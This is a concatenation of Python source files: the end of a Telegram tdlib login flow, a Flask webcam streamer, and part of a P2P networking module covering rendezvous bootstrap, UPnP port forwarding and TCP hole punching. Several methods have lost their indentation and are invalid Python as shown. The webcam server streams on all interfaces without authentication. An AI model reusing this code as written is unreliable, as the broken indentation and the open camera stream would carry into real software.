                # Database and downloaded files live under files_directory.
                'database_directory': os.path.join(self.files_directory, 'database'),
                'use_message_database': self.use_message_database,
                'files_directory': os.path.join(self.files_directory, 'files'),
                'use_secret_chats': self.use_secret_chats,
            },
        }
        return self._send_data(data, result_id='updateAuthorizationState')
def _send_encryption_key(self) -> AsyncResult:
logger.info('Sending encryption key')
key = self._database_encryption_key
if isinstance(key, str):
key = key.encode()
data = {
'@type': 'checkDatabaseEncryptionKey',
'encryption_key': base64.b64encode(key).decode(),
}
return self._send_data(data, result_id='updateAuthorizationState')
def _send_phone_number_or_bot_token(self) -> AsyncResult:
"""Sends phone number or a bot_token"""
if self.phone:
return self._send_phone_number()
elif self.bot_token:
return self._send_bot_token()
else:
raise RuntimeError('Unknown mode: both bot_token and phone are None')
def _send_phone_number(self) -> AsyncResult:
logger.info('Sending phone number')
data = {
'@type': 'setAuthenticationPhoneNumber',
'phone_number': self.phone,
'allow_flash_call': False,
'is_current_phone_number': True,
}
return self._send_data(data, result_id='updateAuthorizationState')
    def _send_add_proxy(self) -> AsyncResult:
        # Register the configured proxy with tdlib before logging in.
        logger.info('Sending addProxy')
        data = {
            '@type': 'addProxy',
            'server': self.proxy_server,
            'port': self.proxy_port,
            'enable': True,
            'type': self.proxy_type,
        }
        # NOTE(review): result_id 'setProxy' does not match the 'addProxy'
        # request type — presumably historical; confirm before changing.
        return self._send_data(data, result_id='setProxy')
def _send_bot_token(self) -> AsyncResult:
logger.info('Sending bot token')
data = {'@type': 'checkAuthenticationBotToken', 'token': self.bot_token}
return self._send_data(data, result_id='updateAuthorizationState')
    def _send_telegram_code(self) -> AsyncResult:
        # Interactive step: read the login code from stdin and submit it.
        logger.info('Sending code')
        code = input('Enter code:')
        data = {'@type': 'checkAuthenticationCode', 'code': str(code)}
        return self._send_data(data, result_id='updateAuthorizationState')
    def _send_password(self) -> AsyncResult:
        # Interactive step: read the 2FA password without echoing it.
        logger.info('Sending password')
        password = getpass.getpass('Password:')
        data = {'@type': 'checkAuthenticationPassword', 'password': password}
        return self._send_data(data, result_id='updateAuthorizationState')
    def _complete_authorization(self) -> None:
        # Terminal state of the login state machine: stop the login loop.
        logger.info('Completing auth process')
        self._authorized = True
|
webcam.py | import time
import queue
import select
import threading
import contextlib
import flask
import v4l2capture
app = flask.Flask('basic-web-cam')
# Set of per-viewer frame queues: gen_stream() adds/removes entries while
# the capture thread broadcasts frames into them.
clients = set()
def gen_frames():
    # Generator: open the first V4L2 camera and yield MJPG-encoded frames
    # forever; the device is closed when the generator is finalized.
    cam = v4l2capture.Video_device("/dev/video0")
    with contextlib.closing(cam):
        cam.set_format(640, 480, fourcc='MJPG')
        cam.create_buffers(1)
        cam.queue_all_buffers()
        cam.start()
        while True:
            # Block until the device has a frame ready to read.
            select.select((cam,), (), ())
            yield cam.read_and_queue()
def engine(stop):
    # Capture-thread body: wait until at least one client is connected,
    # then read frames and broadcast them. `stop` is a mutable flag (a
    # list): the main thread appends to it to request shutdown.
    while not stop:
        while not clients:
            if stop:
                return
            print ("waiting for clients...")
            time.sleep(1)
        for frame in gen_frames():
            if not clients:
                # No viewers left: drop the camera until someone connects.
                break
            if stop:
                return
            broadcast(clients, frame)
def broadcast(clients, frame):
    """
    Push one JPEG frame, wrapped as a multipart chunk, to every client.

    A snapshot of `clients` is taken first: viewer threads add/remove
    queues concurrently (see gen_stream), and iterating the live set can
    raise "RuntimeError: Set changed size during iteration". Clients that
    still hold an undelivered frame are skipped (drop rather than lag).
    """
    chunk = b"--frame\r\nContent-Type: image/jpeg\r\n\r\n" + frame + b"\r\n"
    for client in tuple(clients):
        if client.empty():
            client.put(chunk)
def gen_stream():
    """Per-viewer generator: register a queue and relay frames from it."""
    mailbox = queue.Queue()
    clients.add(mailbox)
    try:
        # Blocks on .get(); a None sentinel would end the stream.
        yield from iter(mailbox.get, None)
    finally:
        # Drop the registration when the HTTP connection goes away.
        clients.remove(mailbox)
@app.route("/")
def index():
    """Serve a minimal page that embeds the MJPEG stream."""
    page = '<!DOCTYPE html><html><body><img src="/stream" /></body></html>'
    return page
@app.route("/stream")
def stream():
    """Stream camera frames to the browser as multipart/x-mixed-replace."""
    mimetype = 'multipart/x-mixed-replace; boundary=frame'
    return flask.Response(gen_stream(), mimetype=mimetype)
if __name__ == "__main__":
    # Mutable stop flag shared with the capture thread: an empty list is
    # falsy; appending any item requests shutdown.
    stop = []
    task = threading.Thread(target=engine, args=(stop,))
    task.start()
    try:
        app.run(host="0.0.0.0")
    finally:
        # Signal the capture thread and wait for it to exit.
        stop.append(1)
        task.join()
|
net.py | """
Handles P2P connections.
All networking functions are ultimately done through
this class.
"""
import hashlib
import signal
import zlib
from ast import literal_eval
from .nat_pmp import NatPMP
from .rendezvous_client import *
from .unl import UNL
from .upnp import *
# How many times a single message can be retransmitted.
max_retransmissions = 1
# Minimum time (seconds) that must pass between retransmissions.
min_retransmit_interval = 5
# A theoretical time (seconds) for a message to propagate across the network.
propagation_delay = 5
# A table of message hashes for received messages.
# NOTE(review): grows without bound until clear_seen_messages() is called.
seen_messages = {}
# How often (seconds) to get new DHT messages.
dht_msg_interval = 5
# How often (seconds) to re-bootstrap.
rendezvous_interval = 30 * 60
# How often to re-advertise node.
# Update bootstrapping server every 24 hours.
advertise_interval = 60 * 60 * 12
# Time (seconds) that must elapse between accepting simultaneous opens.
sim_open_interval = 2
# Bootstrapping + TCP hole punching server.
rendezvous_servers = [
    {
        "addr": "162.243.213.95",
        "port": 8000
    }
]
# Web server running script to test port forwarding.
# And get WAN IP address.
forwarding_servers = [
    {
        "addr": "185.86.149.128",
        "port": 80,
        "url": "/net.php"
    },
    {
        "addr": "185.61.148.22",
        "port": 80,
        "url": "/net.php"
    }
]
# Debug logging.
logging.basicConfig()
log = logging.getLogger(__name__)
def is_msg_old(msg, record_seen=0):
    """
    Return 1 when `msg` was seen too recently or retransmitted too often.

    Args:
        msg: Message payload (str or bytes); str is encoded as ASCII.
        record_seen: When truthy, also record this sighting via
            record_msg_hash().

    Returns:
        1 when the message should be treated as old/duplicate, else 0.
    """
    # isinstance is the idiomatic type check (was: type(msg) == str).
    if isinstance(msg, str):
        msg = msg.encode("ascii")
    response_hash = hashlib.sha256(msg).hexdigest()
    if response_hash in seen_messages:
        seen = seen_messages[response_hash]
        # Too soon since the last sighting?
        elapsed = int(time.time()) - seen["last"]
        if elapsed < min_retransmit_interval:
            return 1
        # Retransmitted too many times already?
        if seen["times"] >= max_retransmissions:
            return 1
    if record_seen:
        record_msg_hash(msg)
    return 0
def record_msg_hash(msg):
    """
    Record a sighting of `msg` in the global seen_messages table.

    Returns 1 when the message was fresh and its entry created/updated,
    0 when is_msg_old() already rejects it.
    """
    # isinstance is the idiomatic type check (was: type(msg) == str).
    if isinstance(msg, str):
        msg = msg.encode("ascii")
    response_hash = hashlib.sha256(msg).hexdigest()
    if not is_msg_old(msg):
        timestamp = int(time.time())
        if response_hash in seen_messages:
            # Existing entry: bump retransmission count and timestamp.
            seen = seen_messages[response_hash]
            seen["times"] += 1
            seen["last"] = timestamp
        else:
            # First sighting of this message.
            seen_messages[response_hash] = {
                "times": 1,
                "last": timestamp
            }
        return 1
    else:
        return 0
def clear_seen_messages():
    # Reset the global duplicate-detection table (rebinds the module
    # global, so existing references to the old dict are unaffected).
    global seen_messages
    seen_messages = {}
class Net:
    def __init__(self, net_type="p2p", nat_type="unknown", node_type="unknown",
                 max_outbound=10, max_inbound=10, passive_bind="0.0.0.0",
                 passive_port=50500, interface="default", wan_ip=None,
                 dht_node=None, error_log_path="error.log", debug=0,
                 sys_clock=None, servers=None):
        """
        Configure a Net instance; no sockets are opened here — call
        start() to determine NAT/node type and begin listening.
        """
        # List of outbound connections (from us, to another node.)
        self.outbound = []
        # List of inbound connections (to us, from another node.)
        self.inbound = []
        # Socket to receive inbound connections on.
        self.passive = None
        # Type of node: simultaneous, active, passive.
        self.node_type = node_type
        # NAT type: preserving, delta, reuse, random.
        self.nat_type = nat_type
        # Address to listen() on for inbound cons.
        self.passive_bind = passive_bind
        # Port to listen() on for inbound cons.
        self.passive_port = int(passive_port)
        # How many connections can we accept from other nodes?
        self.max_outbound = int(max_outbound)
        # How many connections can we make to other nodes?
        self.max_inbound = int(max_inbound)
        # List of servers to do port forwarding checks.
        self.forwarding_servers = forwarding_servers
        # Unix timestamp of last bootstrap.
        self.last_bootstrap = None
        # Unix timestamp of last DHT direct message.
        self.last_dht_msg = None
        # Unix timestamp of last advertise.
        self.last_advertise = None
        # What interface to make outbound connections from?
        self.interface = interface
        # Skip advertise if we have at least this many inbound connections.
        self.min_connected = 3
        # Unix timestamp of last simultaneous open challenge.
        self.last_passive_sim_open = 0
        # Does this Net instance need to bootstrap?
        self.enable_bootstrap = 1
        # Does this Net instance need to advertise?
        self.enable_advertise = 1
        # Should we try open ports?
        self.enable_forwarding = 1
        # Is simultaneous open enabled?
        self.enable_simultaneous = 1
        # Does this Net instance reject duplicate messages
        # (same hash as previous messages)?
        self.enable_duplicates = 1
        # Where should I store errors?
        self.error_log_path = error_log_path
        # Indicates port forwarding state.
        self.forwarding_type = "manual"
        # Debug mode shows debug messages.
        self.debug = debug
        # Network: p2p or direct.
        self.net_type = net_type
        # Calculate clock skew from NTP.
        self.sys_clock = sys_clock
        # List of rendezvous servers.
        self.rendezvous_servers = servers or rendezvous_servers
        # Rendezvous / boostrapping client.
        self.rendezvous = RendezvousClient(
            self.nat_type, rendezvous_servers=self.rendezvous_servers,
            interface=self.interface,
            sys_clock=self.sys_clock
        )
        # DHT node for receiving direct messages from other nodes.
        self.dht_node = dht_node
        # DHT messages received from DHT.
        self.dht_messages = []
        # Subscribes to certain messages from DHT.
        # Todo: move status messages to file transfer client
        def build_dht_msg_handler():
            def dht_msg_handler(node, msg):
                self.debug_print("DHT msg handler in Net")
                # Only messages matching these patterns are kept.
                valid_needles = [
                    '^REVERSE_CONNECT',
                    '^REVERSE_QUERY',
                    '^REVERSE_ORIGIN',
                    """u?("|')status("|')(:|,)\s+u?("|')SYN("|')""",
                    """u?("|')status("|')(:|,)\s+u?("|')SYN-ACK("|')""",
                    """u?("|')status("|')(:|,)\s+u?("|')ACK("|')""",
                    """u?("|')status("|')(:|,)\s+u?("|')RST("|')""",
                ]
                # Convert zlib packed binary to Python object.
                self.debug_print("In net dht" + str(type(msg)))
                if type(msg) == type(b""):
                    try:
                        msg = literal_eval(zlib.decompress(msg))
                    except:
                        pass
                # Encode result to unicode for RE checks.
                """
                If buffer errors result: enable this.
                try:
                    if sys.version_info >= (3, 0, 0):
                        if type(msg) == bytes:
                            msg = msg.decode("utf-8")
                    else:
                        if type(msg) == str:
                            msg = unicode(msg)
                except:
                    return
                """
                # Check for matches.
                for needle in valid_needles:
                    if re.search(needle, str(msg)) is not None:
                        msg = {
                            u"message": msg,
                            u"source": None
                        }
                        self.dht_messages.append(msg)
                        return
            return dht_msg_handler
        # Add message handler to DHT for our messages.
        self.dht_msg_handler = build_dht_msg_handler()
        if self.dht_node is not None:
            self.dht_node.add_message_handler(self.dht_msg_handler)
        # External IP of this node.
        self.wan_ip = wan_ip or get_wan_ip()
        # Node type details only known after network is start()ed.
        self.unl = None
        # List of connections that still need to respond to
        # our reverse query.
        self.pending_reverse_queries = []
        # Time frame for connection to respond to reverse query.
        self.reverse_query_expiry = 60
        # Enable more than one connection to the same IP.
        self.enable_duplicate_ip_cons = 0
        # Net instances hide their con details to prioritise direct cons.
        if self.net_type == "direct":
            self.disable_bootstrap()
            self.enable_duplicate_ip_cons = 1
        # Set to 1 when self.start() has been called.
        self.is_net_started = 0
        # Start synchronize thread.
        # t = Thread(target=self.synchronize_loop)
        # t.setDaemon(True)
        # t.start()
    def synchronize_loop(self):
        # Background loop (thread start is currently commented out in
        # __init__): periodically synchronize once the net is started.
        while 1:
            if self.is_net_started:
                self.synchronize()
            time.sleep(5)
    def debug_print(self, msg):
        # Route all debug output through the module-level logger.
        log.debug(str(msg))
    def disable_duplicates(self):
        # Filter out duplicate replies (same hash) on new connections.
        self.enable_duplicates = 0
    def disable_bootstrap(self):
        # Do not contact rendezvous servers for peers.
        self.enable_bootstrap = 0
    def disable_advertise(self):
        # Never list this node on the rendezvous server.
        self.enable_advertise = 0
    def disable_simultaneous(self):
        # Never attempt TCP-hole-punched (simultaneous open) connections.
        self.enable_simultaneous = 0
    def disable_forwarding(self):
        # Never attempt UPnP / NATPMP port forwarding.
        self.enable_forwarding = 0
def get_connection_no(self):
return len(self.outbound) + len(self.inbound)
# Used to reject duplicate connections.
def validate_node(self, node_ip, node_port=None, same_nodes=1):
self.debug_print("Validating: " + node_ip)
# Is this a valid IP?
if not is_ip_valid(node_ip) or node_ip == "0.0.0.0":
self.debug_print("Invalid node ip in validate node")
return 0
# Is this a valid port?
if node_port != 0 and node_port is not None:
if not is_valid_port(node_port):
self.debug_print("Invalid node port in validate port")
return 0
"""
Don't accept connections from self to passive server
or connections to already connected nodes.
"""
if not self.enable_duplicate_ip_cons:
# Don't connect to ourself.
if (node_ip == "127.0.0.1" or
node_ip == get_lan_ip(self.interface) or
node_ip == self.wan_ip):
self.debug_print("Cannot connect to ourself.")
return 0
# No, really: don't connect to ourself.
if node_ip == self.passive_bind and node_port == self.passive_port:
self.debug_print("Error connecting to same listen server.")
return 0
# Don't connect to same nodes.
if same_nodes:
for node in self.outbound + self.inbound:
try:
addr, port = node["con"].s.getpeername()
if node_ip == addr:
self.debug_print("Already connected to this node.")
return 0
except Exception as e:
print(e)
return 0
return 1
    # Make an outbound con to a passive or simultaneous node.
    def add_node(self, node_ip, node_port, node_type, timeout=5):
        """
        Connect out to a node and record it in self.outbound.

        node_type selects the strategy: "passive" is a plain TCP connect,
        "simultaneous" attempts a TCP-hole-punched connection (requires a
        predictable NAT and a started net). Returns the new connection,
        the existing one if already connected, or None on failure.
        """
        # Correct type for port.
        node_port = int(node_port)
        # Debug info.
        msg = "Attempting to connect to %s:%s:%s" % (
            node_ip, str(node_port), node_type
        )
        self.debug_print(msg)
        # Already connected to them.
        con = None
        try:
            if not self.enable_duplicate_ip_cons:
                for node in self.outbound + self.inbound:
                    if node_ip == node["ip"]:
                        self.debug_print("Already connected.")
                        con = node["con"]
                        return con
            # Avoid connecting to ourself.
            if not self.validate_node(node_ip, node_port):
                self.debug_print("Validate node failed.")
                return None
            # Make a simultaneous open connection.
            if node_type == "simultaneous" and self.enable_simultaneous:
                # Check they've started net first
                # If they haven't we won't know the NAT details / node type.
                if not self.is_net_started:
                    raise Exception("Make sure to start net before you add"
                                    " node.")
                if self.nat_type in self.rendezvous.predictable_nats:
                    # Attempt to make active simultaneous connection.
                    old_timeout = self.rendezvous.timeout
                    try:
                        self.rendezvous.timeout = timeout
                        self.debug_print("Attempting simultaneous challenge")
                        con = self.rendezvous.simultaneous_challenge(
                            node_ip, node_port, "TCP"
                        )
                    except Exception as e:
                        self.debug_print("sim challenge failed")
                        error = parse_exception(e)
                        self.debug_print(error)
                        log_exception(self.error_log_path, error)
                        return None
                    # Restore the client's original timeout.
                    self.rendezvous.timeout = old_timeout
                    # Record node details and return con.
                    self.rendezvous.simultaneous_cons = []
                    if con is not None:
                        node = {
                            "con": con,
                            "type": "simultaneous",
                            "ip": node_ip,
                            "port": 0
                        }
                        self.outbound.append(node)
                        self.debug_print("SUCCESS")
                    else:
                        self.debug_print("FAILURE")
            # Passive outbound -- easiest to connect to.
            if node_type == "passive":
                try:
                    # Try connect to passive server.
                    con = Sock(node_ip, node_port, blocking=0,
                               timeout=timeout, interface=self.interface)
                    node = {
                        "con": con,
                        "type": "passive",
                        "ip": node_ip,
                        "port": node_port
                    }
                    self.outbound.append(node)
                    self.debug_print("SUCCESS")
                except Exception as e:
                    self.debug_print("FAILURE")
                    error = parse_exception(e)
                    self.debug_print(error)
                    log_exception(self.error_log_path, error)
                    return None
            # Return new connection.
            return con
        finally:
            # Remove undesirable messages from replies.
            # Save message: 0 = no, 1 = yes.
            def filter_msg_check_builder():
                def filter_msg_check(msg):
                    # Allow duplicate replies?
                    record_seen = not self.enable_duplicates
                    # Check if message is old.
                    return not is_msg_old(msg, record_seen)
                return filter_msg_check
            # Patch sock object to reject duplicate replies
            # If it's enabled.
            if con is not None:
                con.reply_filter = filter_msg_check_builder()
    def bootstrap(self):
        """
        When the software is first started, it needs to retrieve
        a list of nodes to connect to the network to. This function
        asks the server for N nodes which consists of at least N
        passive nodes and N simultaneous nodes. The simultaneous
        nodes are prioritized if the node_type for the machine
        running this software is simultaneous, with passive nodes
        being used as a fallback. Otherwise, the node exclusively
        uses passive nodes to bootstrap.
        This algorithm is designed to preserve passive node's
        inbound connection slots.
        """
        # Disable bootstrap.
        if not self.enable_bootstrap:
            return None
        # Rate-limit bootstrap requests to the rendezvous server.
        t = time.time()
        if self.last_bootstrap is not None:
            if t - self.last_bootstrap <= rendezvous_interval:
                self.debug_print("Bootstrapped recently")
                return None
        self.last_bootstrap = t
        self.debug_print("Searching for nodes to connect to.")
        try:
            connection_slots = self.max_outbound - (len(self.outbound))
            if connection_slots > 0:
                # Connect to rendezvous server.
                rendezvous_con = self.rendezvous.server_connect()
                # Retrieve random nodes to bootstrap with.
                rendezvous_con.send_line("BOOTSTRAP " +
                                         str(self.max_outbound * 2))
                choices = rendezvous_con.recv_line(timeout=2)
                if choices == "NODES EMPTY":
                    rendezvous_con.close()
                    self.debug_print("Node list is empty.")
                    return self
                else:
                    self.debug_print("Found node list.")
                # Parse node list: entries look like "p:1.2.3.4:1234".
                choices = re.findall("(?:(p|s)[:]([0-9]+[.][0-9]+[.][0-9]+[.][0-9]+)[:]([0-9]+))+\s?", choices)
                rendezvous_con.s.close()
                # Attempt to make active simultaneous connections.
                passive_nodes = []
                for node in choices:
                    # Out of connection slots.
                    if not connection_slots:
                        break
                    # Add to list of passive nodes.
                    node_type, node_ip, node_port = node
                    self.debug_print(str(node))
                    if node_type == "p":
                        passive_nodes.append(node)
                # Use passive to make up the remaining cons.
                i = 0
                while i < len(passive_nodes) and connection_slots > 0:
                    node_type, node_ip, node_port = passive_nodes[i]
                    con = self.add_node(node_ip, node_port, "passive")
                    if con is not None:
                        connection_slots -= 1
                        self.debug_print("Con successful.")
                    else:
                        self.debug_print("Con failed.")
                    i += 1
        except Exception as e:
            self.debug_print("Unknown error in bootstrap()")
            error = parse_exception(e)
            log_exception(self.error_log_path, error)
        return self
def advertise(self):
"""
This function tells the rendezvous server that our node is ready to
accept connections from other nodes on the P2P network that run the
bootstrap function. It's only used when net_type == p2p
"""
# Advertise is disabled.
if not self.enable_advertise:
self.debug_print("Advertise is disbled!")
return None
# Direct net server is reserved for direct connections only.
if self.net_type == "direct" and self.node_type == "passive":
return None
# Net isn't started!.
if not self.is_net_started:
raise Exception("Please call start() before you call advertise()")
# Avoid raping the rendezvous server with excessive requests.
t = time.time()
if self.last_advertise is not None:
if t - self.last_advertise <= advertise_interval:
return None
if len(self.inbound) >= self.min_connected:
return None
self.last_advertise = t
# Tell rendezvous server to list us.
try:
# We're a passive node.
if self.node_type == "passive" and\
self.passive_port is not None and\
self.enable_advertise:
self.rendezvous.passive_listen(self.passive_port,
self.max_inbound)
"""
Simultaneous open is only used as a fail-safe for connections to
nodes on the direct_net and only direct_net can list itself as
simultaneous so its safe to leave this enabled.
"""
if self.node_type == "simultaneous":
self.rendezvous.simultaneous_listen()
except Exception as e:
error = parse_exception(e)
log_exception(self.error_log_path, error)
return self
    def determine_node(self):
        """
        Determines the type of node based on a combination of forwarding
        reachability and NAT type.
        """
        # Manually set node_type as simultaneous.
        if self.node_type == "simultaneous":
            if self.nat_type != "unknown":
                return "simultaneous"
        # Get IP of binding interface.
        unspecific_bind = ["0.0.0.0", "127.0.0.1", "localhost"]
        if self.passive_bind in unspecific_bind:
            lan_ip = get_lan_ip(self.interface)
        else:
            lan_ip = self.passive_bind
        # Passive node checks: can other nodes reach our listen port?
        if lan_ip is not None \
                and self.passive_port is not None and self.enable_forwarding:
            self.debug_print("Checking if port is forwarded.")
            # Check port isn't already forwarded.
            if is_port_forwarded(lan_ip, self.passive_port, "TCP",
                                 self.forwarding_servers):
                msg = "Port already forwarded. Skipping NAT traversal."
                self.debug_print(msg)
                self.forwarding_type = "forwarded"
                return "passive"
            else:
                self.debug_print("Port is not already forwarded.")
            # Most routers.
            try:
                self.debug_print("Trying UPnP")
                UPnP(self.interface).forward_port("TCP", self.passive_port,
                                                 lan_ip)
                if is_port_forwarded(lan_ip, self.passive_port, "TCP",
                                     self.forwarding_servers):
                    self.forwarding_type = "UPnP"
                    self.debug_print("Forwarded port with UPnP.")
                else:
                    self.debug_print("UPnP failed to forward port.")
            except Exception as e:
                # Log exception.
                error = parse_exception(e)
                log_exception(self.error_log_path, error)
                self.debug_print("UPnP failed to forward port.")
            # Apple devices.
            try:
                self.debug_print("Trying NATPMP.")
                NatPMP(self.interface).forward_port("TCP",
                                                    self.passive_port,
                                                    lan_ip)
                if is_port_forwarded(lan_ip, self.passive_port, "TCP",
                                     self.forwarding_servers):
                    self.forwarding_type = "NATPMP"
                    self.debug_print("Port forwarded with NATPMP.")
                else:
                    self.debug_print("Failed to forward port with NATPMP.")
                    self.debug_print("Falling back on TCP hole punching or"
                                     " proxying.")
            except Exception as e:
                # Log exception
                error = parse_exception(e)
                log_exception(self.error_log_path, error)
                self.debug_print("Failed to forward port with NATPMP.")
            # Check it worked: forwarding_type changed from "manual".
            if self.forwarding_type != "manual":
                return "passive"
        # Fail-safe node types.
        if self.nat_type != "unknown":
            return "simultaneous"
        else:
            return "active"
    # Receive inbound connections.
    def start_passive_server(self):
        # Listening socket for inbound connections; SO_REUSEADDR avoids
        # "address already in use" on quick restarts.
        self.passive = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.passive.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.passive.bind((self.passive_bind, self.passive_port))
        self.passive.listen(self.max_inbound)
        # Port 0 means "pick any free port": record what the OS chose.
        if not self.passive_port:
            self.passive_port = self.passive.getsockname()[1]
    def start(self):
        """
        This function determines node and NAT type, saves connectivity details,
        and starts any needed servers to be a part of the network. This is
        usually the first function called after initialising the Net class.
        """
        self.debug_print("Starting networking.")
        self.debug_print("Make sure to iterate over replies if you need"
                         " connection alive management!")
        # Register a ctrl + c handler so stop() runs on interrupt.
        signal.signal(signal.SIGINT, self.stop)
        # Save WAN IP.
        self.debug_print("WAN IP = " + str(self.wan_ip))
        # Check rendezvous server is up.
        try:
            rendezvous_con = self.rendezvous.server_connect()
            rendezvous_con.close()
        except:
            raise Exception("Unable to connect to rendezvous server.")
        # Started no matter what
        # since LAN connections are always possible.
        self.start_passive_server()
        # Determine NAT type.
        if self.nat_type == "unknown":
            self.debug_print("Determining NAT type.")
            nat_type = self.rendezvous.determine_nat()
            if nat_type is not None and nat_type != "unknown":
                self.nat_type = nat_type
                self.rendezvous.nat_type = nat_type
                self.debug_print("NAT type = " + nat_type)
            else:
                self.debug_print("Unable to determine NAT type.")
        # Check NAT type if node is simultaneous
        # is manually specified.
        if self.node_type == "simultaneous":
            if self.nat_type not in self.rendezvous.predictable_nats:
                self.debug_print("Manual setting of simultanous specified but"
                                 " ignored since NAT does not support it.")
                self.node_type = "active"
        else:
            # Determine node type.
            self.debug_print("Determining node type.")
            # No checks for manually specifying passive
            # (there probably should be.)
            if self.node_type == "unknown":
                self.node_type = self.determine_node()
        # Prevent P2P nodes from running as simultaneous.
        if self.net_type == "p2p":
            """
            TCP hole punching is reserved specifically for direct networks
            (a net object reserved for receiving direct connections
            -- p2p is for connecting to the main network. The reason for this
            is you can't do multiple TCP hole punches at the same time so
            reserved for direct network where it's most needed.
            """
            if self.node_type == "simultaneous":
                self.debug_print("Simultaneous is not allowed for P2P")
                self.node_type = "active"
                self.disable_simultaneous()
        self.debug_print("Node type = " + self.node_type)
        # Close stray cons from determine_node() tests.
        self.close_cons()
        # Set net started status.
        self.is_net_started = 1
        # Initialise our UNL details.
        self.unl = UNL(
            net=self,
            dht_node=self.dht_node,
            wan_ip=self.wan_ip
        )
        # Nestled calls.
        return self
    def stop(self, signum=None, frame=None):
        # Shut networking down: close the listen socket, deregister from
        # the rendezvous server and close every open connection. Also
        # installed as the SIGINT handler (see start()).
        self.debug_print("Stopping networking.")
        if self.passive is not None:
            try:
                self.passive.shutdown(1)
            except:
                pass
            self.passive.close()
            self.passive = None
        # Only deregister if we actually advertised.
        if self.last_advertise is not None:
            self.rendezvous.leave_fight()
        """
        Just let the threads timeout by themselves.
        Otherwise mutex deadlocks could occur.
        for unl_thread in self.unl.unl_threads:
            unl_thread.exit()
        """
        # Iterating self yields connections (__iter__ defined elsewhere).
        for con in self:
            con.close()
        # When invoked as a signal handler, abort the interrupted flow.
        if signum is not None:
            raise Exception("Process was interrupted.")
    # Return a connection that matches a remote UNL.
    def con_by_unl(self, unl, cons=None):
        # Search (by default) every known connection for one whose remote
        # UNL equals `unl`; returns None when there is no usable match.
        if cons is None:
            cons = self.outbound + self.inbound
        for con in cons:
            # Accept both raw Sock objects and node dicts.
            if not isinstance(con, Sock):
                con = con["con"]
            if con.unl is not None:
                self.debug_print("CMP")
                self.debug_print(unl)
                self.debug_print(con.unl)
                if unl == con.unl:
                    # Connection not ready: direct-net cons are unusable
                    # until their nonce has been received.
                    if con.nonce is None and self.net_type == "direct":
                        continue
                    return con
            else:
                self.debug_print("\a")
                self.debug_print("Con UNL is None (in con by unl)")
                self.debug_print(cons)
        return None
# Return a connection by its IP.
def con_by_ip(self, ip):
for node in self.outbound + self.inbound:
# Used to block UNLs until nonces are received.
# Otherwise they might try do I/O and ruin their protocols.
if self.net_type == "direct":
if node["con"].nonce is None and self.net_type == "direct":
continue
if node["ip"] == ip:
return node["con"]
return None
def generate_con_id(self, nonce, their_wan_ip, our_wan_ip):
    """Derive a deterministic 64-char hex connection ID from a nonce and
    the two endpoint IPs.

    Each IP is hashed to a fixed length, then the two hashes are combined
    in a canonical order (numerically larger hash first) so both peers
    derive the same ID regardless of which side computes it. Returns a
    text (unicode) string on both Python 2 and Python 3.
    """
    # Convert WAN IPs to bytes.
    if sys.version_info >= (3, 0, 0):
        if type(their_wan_ip) == str:
            their_wan_ip = their_wan_ip.encode("ascii")
        if type(our_wan_ip) == str:
            our_wan_ip = our_wan_ip.encode("ascii")
    else:
        if type(their_wan_ip) == unicode:
            their_wan_ip = str(their_wan_ip)
        # Bug fix: this previously compared type(our_wan_ip) against the
        # value our_wan_ip itself (always False), so unicode values were
        # never converted on Python 2.
        if type(our_wan_ip) == unicode:
            our_wan_ip = str(our_wan_ip)
    # Hash WAN IPs to make them the same length.
    their_wan_ip = hashlib.sha256(their_wan_ip).hexdigest().encode("ascii")
    our_wan_ip = hashlib.sha256(our_wan_ip).hexdigest().encode("ascii")
    # Derive fingerprint: larger hash always goes first so the result is
    # symmetric in the two IPs.
    int_their_wan_ip = int(their_wan_ip, 16)
    int_our_wan_ip = int(our_wan_ip, 16)
    if int_our_wan_ip > int_their_wan_ip:
        fingerprint = hashlib.sha256(our_wan_ip + their_wan_ip)
    else:
        # If both are the same the order doesn't matter.
        fingerprint = hashlib.sha256(their_wan_ip + our_wan_ip)
    fingerprint = fingerprint.hexdigest().encode("ascii")
    # Convert nonce to bytes.
    if sys.version_info >= (3, 0, 0):
        if type(nonce) == str:
            nonce = nonce.encode("ascii")
    else:
        if type(nonce) == unicode:
            nonce = str(nonce)
    # Generate con ID.
    con_id = hashlib.sha256(nonce + fingerprint).hexdigest()
    # Normalise to a text string on either Python version.
    if sys.version_info >= (3, 0, 0):
        if type(con_id) == bytes:
            con_id = con_id.decode("utf-8")
    else:
        if type(con_id) == str:
            con_id = unicode(con_id)
    # Return con ID.
    return con_id
def con_by_id(self, expected_id):
    """Find a connection whose derived connection ID equals *expected_id*.

    The ID is recomputed per connection from its nonce plus the pair of
    endpoint IPs via generate_con_id(). Returns the Sock, or None.
    """
    for node in self.outbound + self.inbound:
        # Nothing to test: on direct networks the ID requires the nonce.
        if node["con"].nonce is None and self.net_type == "direct":
            self.debug_print("Nonce not set")
            continue
        # Generate con_id from con.
        try:
            their_wan_ip, junk = node["con"].s.getpeername()
        except:
            # Socket already dead -- skip it.
            continue
        # For LAN peers, compare using our LAN IP rather than our WAN IP.
        if is_ip_private(their_wan_ip):
            our_wan_ip = get_lan_ip(self.interface)
        else:
            our_wan_ip = self.wan_ip
        found_id = self.generate_con_id(
            node["con"].nonce,
            their_wan_ip,
            our_wan_ip
        )
        # Check result.
        if found_id == expected_id:
            return node["con"]
    return None
# Send a message to all currently established connections.
def broadcast(self, msg, source_con=None):
    """Send *msg* to every connection except *source_con* (the peer the
    message originally arrived from, if any)."""
    for entry in self.outbound + self.inbound:
        con = entry["con"]
        if con != source_con:
            con.send_line(msg)
def close_cons(self):
    """Close every connection and reset connection state.

    Used to discard stray test connections left over from
    determine_node(); also restarts the passive listen socket so its
    pending client backlog is flushed.
    """
    # Close all connections.
    for node in self.inbound + self.outbound:
        node["con"].close()
    # Flush client queue for passive server.
    if self.node_type == "passive" and self.passive is not None:
        self.passive.close()
        self.start_passive_server()
    # Start from scratch.
    self.inbound = []
    self.outbound = []
def synchronize(self):
    """Single housekeeping pass over all connection state.

    Reaps dead connections, expires pending reverse-connect queries,
    reads connection nonces (direct nets), services DHT reverse-connect
    messages, accepts new passive / hole-punched inbound connections and
    re-bootstraps / re-advertises as needed. Called from __len__ and
    __iter__ so ordinary iteration keeps the network serviced.
    """
    # Clean up dead connections.
    # NOTE(review): the lists are accessed by eval()-ing their names;
    # fragile but behaviour-preserving -- iterate a copy, remove from
    # the live list.
    for node_list_name in ["self.inbound", "self.outbound"]:
        node_list = eval(node_list_name)[:]
        for node in node_list:
